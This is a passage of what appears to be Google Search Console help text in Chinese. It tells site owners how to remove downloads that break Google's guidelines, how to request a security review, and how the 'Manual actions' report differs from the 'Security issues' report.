查找相应的下载内容,并确认其是否符合下载内容指南

  • 如果您网站上的任何下载内容违反了这些指南,请将其移除。
  • 如果下载内容没有违反这些指南,则无需将其移除。

2. 提交审核请求

移除相应文件(或验证您的下载内容符合下载内容指南)后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。即使您没有提交审核请求,Google 最终也会评估大多数下载内容并将其归类为“可接受”或“有害”。不过,提交审核请求有助于加快评估流程。

 

“手动操作”报告与“安全问题”报告有何区别?

“手动操作”报告会列出您的网页或网站中的问题,这些问题主要会试图操纵我们的搜索索引,并不一定会给用户带来危险。其中报告的大多数问题都会导致相应网页或网站在搜索结果中被降位或移除(我们不会向用户提供任何可见提示)。

“安全问题”报告会列出关于您的网站被黑客入侵的指示或您的网站上可能会危害访问者或其计算机的行为:例如,发起网上诱骗攻击,或者在用户的计算机上安装恶意软件或垃圾软件。若这些网页出现在搜索结果中,它们可能会带有警告标签;若用户尝试访问这些网页,浏览器可能会显示插页式警告页面。

该内容对您有帮助吗?
您有什么改进建议?